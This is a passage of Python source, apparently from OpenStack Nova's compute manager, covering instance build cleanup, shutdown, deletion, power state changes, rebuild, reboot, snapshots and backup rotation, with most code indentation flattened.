self.driver.spawn(context, instance, image,
injected_files, admin_password,
network_info=network_info,
block_device_info=block_device_info)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.end', fault=e)
except exception.ComputeResourcesUnavailable as e:
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=e.format_message())
except exception.BuildAbortException as e:
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
except (exception.FixedIpLimitExceeded,
exception.NoMoreNetworks, exception.NoMoreFixedIps) as e:
LOG.warning(_LW('No more network or fixed IP to be allocated'),
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
msg = _('Failed to allocate the network(s) with error %s, '
'not rescheduling.') % e.format_message()
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.VirtualInterfaceCreateException,
exception.VirtualInterfaceMacAddressException) as e:
LOG.exception(_LE('Failed to allocate network(s)'),
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.ImageNotActive,
exception.ImageUnacceptable) as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=six.text_type(e))
# NOTE(alaski): This is only useful during reschedules, remove it now.
instance.system_metadata.pop('network_allocated', None)
self._update_instance_after_spawn(context, instance)
try:
instance.save(expected_task_state=task_states.SPAWNING)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.end', fault=e)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'create.end',
extra_usage_info={'message': _('Success')},
network_info=network_info)
@contextlib.contextmanager
def _build_resources(self, context, instance, requested_networks,
security_groups, image, block_device_mapping):
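        """Set up the network and block device resources needed to build an
        instance.
        Yields a dict with 'network_info' and 'block_device_info'. Most
        failures while preparing resources raise BuildAbortException; if the
        build fails after the resources are yielded they are cleaned up here
        before the original exception is re-raised.
        """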
resources = {}
network_info = None
try:
network_info = self._build_networks_for_instance(context, instance,
requested_networks, security_groups)
resources['network_info'] = network_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
raise
except exception.UnexpectedTaskStateError as e:
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
# Because this allocation is async any failures are likely to occur
# when the driver accesses network_info during spawn().
LOG.exception(_LE('Failed to allocate network(s)'),
instance=instance)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(context, instance, image,
block_device_mapping)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(context, instance,
block_device_mapping)
resources['block_device_info'] = block_device_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
with excutils.save_and_reraise_exception() as ctxt:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
except exception.UnexpectedTaskStateError as e:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
LOG.exception(_LE('Failure prepping block device'),
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
msg = _('Failure prepping block device.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
yield resources
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if not isinstance(exc, (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError)):
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
                # If network_info is empty we are most likely here because of
                # a network allocation failure. Since nothing can be reused
                # on rescheduling, it is better to deallocate the network to
                # eliminate the chance of orphaned ports in neutron.
deallocate_networks = False if network_info else True
try:
self._shutdown_instance(context, instance,
block_device_mapping, requested_networks,
try_deallocate_networks=deallocate_networks)
except Exception:
ctxt.reraise = False
msg = _('Could not clean up failed build,'
' not rescheduling')
raise exception.BuildAbortException(
instance_uuid=instance.uuid, reason=msg)
def _cleanup_allocated_networks(self, context, instance,
requested_networks):
try:
self._deallocate_network(context, instance, requested_networks)
except Exception:
msg = _LE('Failed to deallocate networks')
LOG.exception(msg, instance=instance)
return
instance.system_metadata['network_allocated'] = 'False'
try:
instance.save()
except exception.InstanceNotFound:
# NOTE(alaski): It's possible that we're cleaning up the networks
# because the instance was deleted. If that's the case then this
# exception will be raised by instance.save()
pass
@object_compat
@messaging.expected_exceptions(exception.BuildAbortException,
exception.UnexpectedTaskStateError,
exception.VirtualInterfaceCreateException,
exception.RescheduledException)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def run_instance(self, context, instance, request_spec,
filter_properties, requested_networks,
injected_files, admin_password,
is_first_time, node, legacy_bdm_in_spec):
# NOTE(alaski) This method should be deprecated when the scheduler and
# compute rpc interfaces are bumped to 4.x, and slated for removal in
# 5.x as it is no longer used.
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_run_instance():
self._run_instance(context, request_spec,
filter_properties, requested_networks, injected_files,
admin_password, is_first_time, node, instance,
legacy_bdm_in_spec)
do_run_instance()
def _try_deallocate_network(self, context, instance,
requested_networks=None):
try:
# tear down allocated network structure
self._deallocate_network(context, instance, requested_networks)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to deallocate network for instance.'),
instance=instance)
self._set_instance_error_state(context, instance)
def _get_power_off_values(self, context, instance, clean_shutdown):
"""Get the timing configuration for powering down this instance."""
if clean_shutdown:
timeout = compute_utils.get_value_from_system_metadata(instance,
key='image_os_shutdown_timeout', type=int,
default=CONF.shutdown_timeout)
retry_interval = self.SHUTDOWN_RETRY_INTERVAL
else:
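            # A timeout of zero requests an immediate (hard) power off with
            # no retries.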
timeout = 0
retry_interval = 0
return timeout, retry_interval
def _power_off_instance(self, context, instance, clean_shutdown=True):
"""Power off an instance on this host."""
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
self.driver.power_off(instance, timeout, retry_interval)
def _shutdown_instance(self, context, instance,
bdms, requested_networks=None, notify=True,
try_deallocate_networks=True):
"""Shutdown an instance on this host.
:param:context: security context
:param:instance: a nova.objects.Instance object
:param:bdms: the block devices for the instance to be torn
down
:param:requested_networks: the networks on which the instance
has ports
:param:notify: true if a final usage notification should be
emitted
:param:try_deallocate_networks: false if we should avoid
trying to teardown networking
"""
context = context.elevated()
        LOG.info(_LI('Terminating instance'),
                 context=context, instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.start")
network_info = compute_utils.get_nw_info_for_instance(instance)
# NOTE(vish) get bdms before destroying the instance
vol_bdms = [bdm for bdm in bdms if bdm.is_volume]
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
# NOTE(melwitt): attempt driver destroy before releasing ip, may
# want to keep ip allocated for certain failures
try:
self.driver.destroy(context, instance, network_info,
block_device_info)
except exception.InstancePowerOffFailure:
# if the instance can't power off, don't release the ip
with excutils.save_and_reraise_exception():
pass
except Exception:
with excutils.save_and_reraise_exception():
# deallocate ip and fail without proceeding to
# volume api calls, preserving current behavior
if try_deallocate_networks:
self._try_deallocate_network(context, instance,
requested_networks)
if try_deallocate_networks:
self._try_deallocate_network(context, instance, requested_networks)
for bdm in vol_bdms:
try:
# NOTE(vish): actual driver detach done in driver.destroy, so
# just tell cinder that we are done with it.
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
self.volume_api.detach(context, bdm.volume_id)
except exception.DiskNotFound as exc:
LOG.debug('Ignoring DiskNotFound: %s', exc,
instance=instance)
except exception.VolumeNotFound as exc:
LOG.debug('Ignoring VolumeNotFound: %s', exc,
instance=instance)
except (cinder_exception.EndpointNotFound,
keystone_exception.EndpointNotFound) as exc:
LOG.warning(_LW('Ignoring EndpointNotFound: %s'), exc,
instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.end")
def _cleanup_volumes(self, context, instance_uuid, bdms, raise_exc=True):
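        # Delete any volumes flagged with delete_on_termination, remembering
        # the last failure and optionally re-raising it once all BDMs have
        # been processed.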
exc_info = None
for bdm in bdms:
LOG.debug("terminating bdm %s", bdm,
instance_uuid=instance_uuid)
if bdm.volume_id and bdm.delete_on_termination:
try:
self.volume_api.delete(context, bdm.volume_id)
except Exception as exc:
exc_info = sys.exc_info()
LOG.warning(_LW('Failed to delete volume: %(volume_id)s '
'due to %(exc)s'),
{'volume_id': bdm.volume_id, 'exc': exc})
if exc_info is not None and raise_exc:
six.reraise(exc_info[0], exc_info[1], exc_info[2])
@hooks.add_hook("delete_instance")
def _delete_instance(self, context, instance, bdms, quotas):
"""Delete an instance on this host. Commit or rollback quotas
as necessary.
:param context: nova request context
:param instance: nova.objects.instance.Instance object
:param bdms: nova.objects.block_device.BlockDeviceMappingList object
:param quotas: nova.objects.quotas.Quotas object
"""
was_soft_deleted = instance.vm_state == vm_states.SOFT_DELETED
if was_soft_deleted:
# Instances in SOFT_DELETED vm_state have already had quotas
# decremented.
try:
quotas.rollback()
except Exception:
pass
try:
events = self.instance_events.clear_events_for_instance(instance)
if events:
LOG.debug('Events pending at deletion: %(events)s',
{'events': ','.join(events.keys())},
instance=instance)
self._notify_about_instance_usage(context, instance,
"delete.start")
self._shutdown_instance(context, instance, bdms)
# NOTE(dims): instance.info_cache.delete() should be called after
# _shutdown_instance in the compute manager as shutdown calls
# deallocate_for_instance so the info_cache is still needed
# at this point.
instance.info_cache.delete()
# NOTE(vish): We have already deleted the instance, so we have
# to ignore problems cleaning up the volumes. It
# would be nice to let the user know somehow that
# the volume deletion failed, but it is not
# acceptable to have an instance that can not be
# deleted. Perhaps this could be reworked in the
# future to set an instance fault the first time
# and to only ignore the failure if the instance
# is already in ERROR.
self._cleanup_volumes(context, instance.uuid, bdms,
raise_exc=False)
# if a delete task succeeded, always update vm state and task
# state without expecting task state to be DELETING
instance.vm_state = vm_states.DELETED
instance.task_state = None
instance.power_state = power_state.NOSTATE
instance.terminated_at = timeutils.utcnow()
instance.save()
self._update_resource_tracker(context, instance)
system_meta = instance.system_metadata
instance.destroy()
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
self._complete_deletion(context,
instance,
bdms,
quotas,
system_meta)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def terminate_instance(self, context, instance, bdms, reservations):
"""Terminate an instance on this host."""
# NOTE (ndipanov): If we get non-object BDMs, just get them from the
# db again, as this means they are sent in the old format and we want
# to avoid converting them back when we can just get them.
# Remove this when we bump the RPC major version to 4.0
if (bdms and
any(not isinstance(bdm, obj_base.NovaObject)
for bdm in bdms)):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
@utils.synchronized(instance.uuid)
def do_terminate_instance(instance, bdms):
try:
self._delete_instance(context, instance, bdms, quotas)
except exception.InstanceNotFound:
LOG.info(_LI("Instance disappeared during terminate"),
instance=instance)
except Exception:
# As we're trying to delete always go to Error if something
# goes wrong that _delete_instance can't handle.
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance=instance)
self._set_instance_error_state(context, instance)
do_terminate_instance(instance, bdms)
# NOTE(johannes): This is probably better named power_off_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def stop_instance(self, context, instance, clean_shutdown=True):
"""Stopping an instance on this host."""
@utils.synchronized(instance.uuid)
def do_stop_instance():
current_power_state = self._get_power_state(context, instance)
LOG.debug('Stopping instance; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, current VM '
'power_state: %(current_power_state)s',
dict(vm_state=instance.vm_state,
task_state=instance.task_state,
db_power_state=instance.power_state,
current_power_state=current_power_state),
instance_uuid=instance.uuid)
# NOTE(mriedem): If the instance is already powered off, we are
# possibly tearing down and racing with other operations, so we can
# expect the task_state to be None if something else updates the
# instance and we're not locking it.
expected_task_state = [task_states.POWERING_OFF]
# The list of power states is from _sync_instance_power_state.
if current_power_state in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.info(_LI('Instance is already powered off in the '
'hypervisor when stop is called.'),
instance=instance)
expected_task_state.append(None)
self._notify_about_instance_usage(context, instance,
"power_off.start")
self._power_off_instance(context, instance, clean_shutdown)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.STOPPED
instance.task_state = None
instance.save(expected_task_state=expected_task_state)
self._notify_about_instance_usage(context, instance,
"power_off.end")
do_stop_instance()
def _power_on(self, context, instance):
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.power_on(context, instance,
network_info,
block_device_info)
def _delete_snapshot_of_shelved_instance(self, context, instance,
snapshot_id):
"""Delete snapshot of shelved instance."""
try:
self.image_api.delete(context, snapshot_id)
except (exception.ImageNotFound,
exception.ImageNotAuthorized) as exc:
LOG.warning(_LW("Failed to delete snapshot "
"from shelved instance (%s)."),
exc.format_message(), instance=instance)
except Exception:
LOG.exception(_LE("Something wrong happened when trying to "
"delete snapshot from shelved instance."),
instance=instance)
# NOTE(johannes): This is probably better named power_on_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def start_instance(self, context, instance):
"""Starting an instance on this host."""
self._notify_about_instance_usage(context, instance, "power_on.start")
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
# Delete an image(VM snapshot) for a shelved instance
snapshot_id = instance.system_metadata.get('shelved_image_id')
if snapshot_id:
self._delete_snapshot_of_shelved_instance(context, instance,
snapshot_id)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.POWERING_ON)
self._notify_about_instance_usage(context, instance, "power_on.end")
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def soft_delete_instance(self, context, instance, reservations):
"""Soft delete an instance on this host."""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
try:
self._notify_about_instance_usage(context, instance,
"soft_delete.start")
try:
self.driver.soft_delete(instance)
except NotImplementedError:
# Fallback to just powering off the instance if the
# hypervisor doesn't implement the soft_delete method
self.driver.power_off(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.save(expected_task_state=[task_states.SOFT_DELETING])
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
quotas.commit()
self._notify_about_instance_usage(context, instance, "soft_delete.end")
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def restore_instance(self, context, instance):
"""Restore a soft-deleted instance on this host."""
self._notify_about_instance_usage(context, instance, "restore.start")
try:
self.driver.restore(instance)
except NotImplementedError:
# Fallback to just powering on the instance if the hypervisor
# doesn't implement the restore method
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.RESTORING)
self._notify_about_instance_usage(context, instance, "restore.end")
def _rebuild_default_impl(self, context, instance, image_meta,
injected_files, admin_password, bdms,
detach_block_devices, attach_block_devices,
network_info=None,
recreate=False, block_device_info=None,
preserve_ephemeral=False):
if preserve_ephemeral:
# The default code path does not support preserving ephemeral
# partitions.
raise exception.PreserveEphemeralNotSupported()
detach_block_devices(context, bdms)
if not recreate:
self.driver.destroy(context, instance, network_info,
block_device_info=block_device_info)
instance.task_state = task_states.REBUILD_BLOCK_DEVICE_MAPPING
instance.save(expected_task_state=[task_states.REBUILDING])
new_block_device_info = attach_block_devices(context, instance, bdms)
instance.task_state = task_states.REBUILD_SPAWNING
instance.save(
expected_task_state=[task_states.REBUILD_BLOCK_DEVICE_MAPPING])
self.driver.spawn(context, instance, image_meta, injected_files,
admin_password, network_info=network_info,
block_device_info=new_block_device_info)
@object_compat
@messaging.expected_exceptions(exception.PreserveEphemeralNotSupported)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=False):
"""Destroy and re-make this instance.
A 'rebuild' effectively purges all existing data from the system and
remakes the VM with given 'metadata' and 'personalities'.
:param context: `nova.RequestContext` object
:param instance: Instance object
:param orig_image_ref: Original image_ref before rebuild
:param image_ref: New image_ref for rebuild
:param injected_files: Files to inject
:param new_pass: password to set on rebuilt instance
:param orig_sys_metadata: instance system metadata from pre-rebuild
:param bdms: block-device-mappings to use for rebuild
:param recreate: True if the instance is being recreated (e.g. the
hypervisor it was on failed) - cleanup of old state will be
skipped.
:param on_shared_storage: True if instance files on shared storage
:param preserve_ephemeral: True if the default ephemeral storage
partition must be preserved on rebuild
"""
context = context.elevated()
# NOTE (ndipanov): If we get non-object BDMs, just get them from the
# db again, as this means they are sent in the old format and we want
# to avoid converting them back when we can just get them.
# Remove this on the next major RPC version bump
if (bdms and
any(not isinstance(bdm, obj_base.NovaObject)
for bdm in bdms)):
bdms = None
orig_vm_state = instance.vm_state
with self._error_out_instance_on_exception(context, instance):
LOG.info(_LI("Rebuilding instance"), context=context,
instance=instance)
if recreate:
if not self.driver.capabilities["supports_recreate"]:
raise exception.InstanceRecreateNotSupported
self._check_instance_exists(context, instance)
                # Covers the case where the admin expects the instance files
                # to be on shared storage but they are not accessible, and
                # vice versa.
if on_shared_storage != self.driver.instance_on_disk(instance):
raise exception.InvalidSharedStorage(
_("Invalid state of instance files on shared"
" storage"))
if on_shared_storage:
LOG.info(_LI('disk on shared storage, recreating using'
' existing disk'))
else:
image_ref = orig_image_ref = instance.image_ref
LOG.info(_LI("disk not on shared storage, rebuilding from:"
" '%s'"), str(image_ref))
# NOTE(mriedem): On a recreate (evacuate), we need to update
                # the instance's host and node properties to reflect its
# destination node for the recreate.
node_name = None
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception(_LE('Failed to get compute_info for %s'),
self.host)
finally:
instance.host = self.host
instance.node = node_name
instance.save()
if image_ref:
image_meta = self.image_api.get(context, image_ref)
else:
image_meta = {}
# This instance.exists message should contain the original
# image_ref, not the new one. Since the DB has been updated
# to point to the new one... we have to override it.
# TODO(jaypipes): Move generate_image_url() into the nova.image.api
orig_image_ref_url = glance.generate_image_url(orig_image_ref)
extra_usage_info = {'image_ref_url': orig_image_ref_url}
compute_utils.notify_usage_exists(
self.notifier, context, instance,
current_period=True, system_metadata=orig_sys_metadata,
extra_usage_info=extra_usage_info)
# This message should contain the new image_ref
extra_usage_info = {'image_name': image_meta.get('name', '')}
self._notify_about_instance_usage(context, instance,
"rebuild.start", extra_usage_info=extra_usage_info)
instance.power_state = self._get_power_state(context, instance)
instance.task_state = task_states.REBUILDING
instance.save(expected_task_state=[task_states.REBUILDING])
if recreate:
# Needed for nova-network, does nothing for neutron
self.network_api.setup_networks_on_host(
context, instance, self.host)
# For nova-network this is needed to move floating IPs
# For neutron this updates the host in the port binding
# TODO(cfriesen): this network_api call and the one above
# are so similar, we should really try to unify them.
self.network_api.setup_instance_network_on_host(
context, instance, self.host)
network_info = compute_utils.get_nw_info_for_instance(instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = \
self._get_instance_block_device_info(
context, instance, bdms=bdms)
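            # Local helper handed to the rebuild below: it detaches any
            # attached volumes without destroying their block device
            # mappings, so the volumes can be re-attached when the instance
            # is spawned again.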
def detach_block_devices(context, bdms):
for bdm in bdms:
if bdm.is_volume:
self._detach_volume(context, bdm.volume_id, instance,
destroy_bdm=False)
files = self._decode_files(injected_files)
kwargs = dict(
context=context,
instance=instance,
image_meta=image_meta,
injected_files=files,
admin_password=new_pass,
bdms=bdms,
detach_block_devices=detach_block_devices,
attach_block_devices=self._prep_block_device,
block_device_info=block_device_info,
network_info=network_info,
preserve_ephemeral=preserve_ephemeral,
recreate=recreate)
try:
self.driver.rebuild(**kwargs)
except NotImplementedError:
# NOTE(rpodolyaka): driver doesn't provide specialized version
# of rebuild, fall back to the default implementation
self._rebuild_default_impl(**kwargs)
self._update_instance_after_spawn(context, instance)
instance.save(expected_task_state=[task_states.REBUILD_SPAWNING])
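            # If the instance was stopped before the rebuild started, power
            # it back off so it ends up in its original (STOPPED) state.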
if orig_vm_state == vm_states.STOPPED:
LOG.info(_LI("bringing vm to original state: '%s'"),
orig_vm_state, instance=instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = task_states.POWERING_OFF
instance.progress = 0
instance.save()
self.stop_instance(context, instance)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "rebuild.end",
network_info=network_info,
extra_usage_info=extra_usage_info)
def _handle_bad_volumes_detached(self, context, instance, bad_devices,
block_device_info):
"""Handle cases where the virt-layer had to detach non-working volumes
in order to complete an operation.
"""
for bdm in block_device_info['block_device_mapping']:
if bdm.get('mount_device') in bad_devices:
try:
volume_id = bdm['connection_info']['data']['volume_id']
except KeyError:
continue
# NOTE(sirp): ideally we'd just call
# `compute_api.detach_volume` here but since that hits the
# DB directly, that's off limits from within the
# compute-manager.
#
# API-detach
LOG.info(_LI("Detaching from volume api: %s"), volume_id)
volume = self.volume_api.get(context, volume_id)
self.volume_api.check_detach(context, volume)
self.volume_api.begin_detaching(context, volume_id)
# Manager-detach
self.detach_volume(context, volume_id, instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def reboot_instance(self, context, instance, block_device_info,
reboot_type):
"""Reboot an instance on this host."""
# acknowledge the request made it to the manager
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_PENDING
expected_states = (task_states.REBOOTING,
task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED)
else:
instance.task_state = task_states.REBOOT_PENDING_HARD
expected_states = (task_states.REBOOTING_HARD,
task_states.REBOOT_PENDING_HARD,
task_states.REBOOT_STARTED_HARD)
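        # The API may already have moved the task state past REBOOTING /
        # REBOOTING_HARD, so accept any of the intermediate reboot states
        # when saving the instance below.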
context = context.elevated()
LOG.info(_LI("Rebooting instance"), context=context, instance=instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance, "reboot.start")
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=expected_states)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning(_LW('trying to reboot a non-running instance:'
' (state: %(state)s expected: %(running)s)'),
{'state': state, 'running': running},
context=context, instance=instance)
def bad_volumes_callback(bad_devices):
self._handle_bad_volumes_detached(
context, instance, bad_devices, block_device_info)
try:
# Don't change it out of rescue mode
if instance.vm_state == vm_states.RESCUED:
new_vm_state = vm_states.RESCUED
else:
new_vm_state = vm_states.ACTIVE
new_power_state = None
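            # new_power_state is only filled in by the error handler below;
            # on success the driver is re-queried once the reboot finishes.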
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_STARTED
expected_state = task_states.REBOOT_PENDING
else:
instance.task_state = task_states.REBOOT_STARTED_HARD
expected_state = task_states.REBOOT_PENDING_HARD
instance.save(expected_task_state=expected_state)
self.driver.reboot(context, instance,
network_info,
reboot_type,
block_device_info=block_device_info,
bad_volumes_callback=bad_volumes_callback)
except Exception as error:
with excutils.save_and_reraise_exception() as ctxt:
exc_info = sys.exc_info()
# if the reboot failed but the VM is running don't
# put it into an error state
new_power_state = self._get_power_state(context, instance)
if new_power_state == power_state.RUNNING:
LOG.warning(_LW('Reboot failed but instance is running'),
context=context, instance=instance)
compute_utils.add_instance_fault_from_exc(context,
instance, error, exc_info)
self._notify_about_instance_usage(context, instance,
'reboot.error', fault=error)
ctxt.reraise = False
else:
LOG.error(_LE('Cannot reboot instance: %s'), error,
context=context, instance=instance)
self._set_instance_obj_error_state(context, instance)
if not new_power_state:
new_power_state = self._get_power_state(context, instance)
try:
instance.power_state = new_power_state
instance.vm_state = new_vm_state
instance.task_state = None
instance.save()
except exception.InstanceNotFound:
LOG.warning(_LW("Instance disappeared during reboot"),
context=context, instance=instance)
self._notify_about_instance_usage(context, instance, "reboot.end")
@delete_image_on_error
def _do_snapshot_instance(self, context, image_id, instance, rotation):
if rotation < 0:
raise exception.RotationRequiredForBackup()
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_BACKUP)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def backup_instance(self, context, image_id, instance, backup_type,
rotation):
"""Backup an instance on this host.
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around
"""
self._do_snapshot_instance(context, image_id, instance, rotation)
self._rotate_backups(context, instance, backup_type, rotation)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
@delete_image_on_error
def snapshot_instance(self, context, image_id, instance):
"""Snapshot an instance on this host.
:param context: security context
:param instance: a nova.objects.instance.Instance object
:param image_id: glance.db.sqlalchemy.models.Image.Id
"""
        # NOTE(dave-mcnally) The task state will already be set by the API,
        # but if the compute manager crashed or was restarted before the
        # request got here the task state may have been cleared, so we set
        # it again and things continue normally.
try:
instance.task_state = task_states.IMAGE_SNAPSHOT
instance.save(
expected_task_state=task_states.IMAGE_SNAPSHOT_PENDING)
except exception.InstanceNotFound:
# possibility instance no longer exists, no point in continuing
LOG.debug("Instance not found, could not set state %s "
"for instance.",
task_states.IMAGE_SNAPSHOT, instance=instance)
return
except exception.UnexpectedDeletingTaskStateError:
LOG.debug("Instance being deleted, snapshot cannot continue",
instance=instance)
return
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_SNAPSHOT)
def _snapshot_instance(self, context, image_id, instance,
expected_task_state):
context = context.elevated()
instance.power_state = self._get_power_state(context, instance)
try:
instance.save()
LOG.info(_LI('instance snapshotting'), context=context,
instance=instance)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning(_LW('trying to snapshot a non-running instance: '
'(state: %(state)s expected: %(running)s)'),
{'state': state, 'running': running},
instance=instance)
self._notify_about_instance_usage(
context, instance, "snapshot.start")
def update_task_state(task_state,
expected_state=expected_task_state):
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self.driver.snapshot(context, instance, image_id,
update_task_state)
instance.task_state = None
instance.save(expected_task_state=task_states.IMAGE_UPLOADING)
self._notify_about_instance_usage(context, instance,
"snapshot.end")
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the snapshot
# Quickly bail out of here
msg = 'Instance disappeared during snapshot'
LOG.debug(msg, instance=instance)
try:
image_service = glance.get_default_image_service()
image = image_service.show(context, image_id)
if image['status'] != 'active':
image_service.delete(context, image_id)
except Exception:
LOG.warning(_LW("Error while trying to clean up image %s"),
image_id, instance=instance)
except exception.ImageNotFound:
instance.task_state = None
instance.save()
msg = _LW("Image not found during snapshot")
            LOG.warning(msg, instance=instance)
def _post_interrupted_snapshot_cleanup(self, context, instance):
self.driver.post_interrupted_snapshot_cleanup(context, instance)
@object_compat
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
self.driver.volume_snapshot_create(context, instance, volume_id,
create_info)
@object_compat
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info):
self.driver.volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info)
@wrap_instance_fault
def _rotate_backups(self, context, instance, backup_type, rotation):
"""Delete excess backups associated to an instance.
Instances are allowed a fixed number of backups (the rotation number);
this method deletes the oldest backups that exceed the rotation
threshold.
:param context: security context
:param instance: Instance dict
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around;
None if rotation shouldn't be used (as in the case of snapshots)
"""
filters = {'property-image_type': 'backup',
'property-backup_type': backup_type,
'property-instance_uuid': instance.uuid}
images = self.image_api.get_all(context, filters=filters,
sort_key='created_at', sort_dir='desc')
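        # Images come back newest-first (created_at descending), so popping
        # from the end of the list below removes the oldest backups first.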
num_images = len(images)
LOG.debug("Found %(num_images)d images (rotation: %(rotation)d)",
{'num_images': num_images, 'rotation': rotation},
instance=instance)
if num_images > rotation:
# NOTE(sirp): this deletes all backups that exceed the rotation
# limit
excess = len(images) - rotation
LOG.debug("Rotating out %d backups", excess,
instance=instance)
for i in xrange(excess):
image = images.pop()
image_id = image['id']
LOG.debug("Deleting image %s", image_id,
instance=instance)
self.image_api.delete(context, image_id)
@object_compat
@wrap_exception()
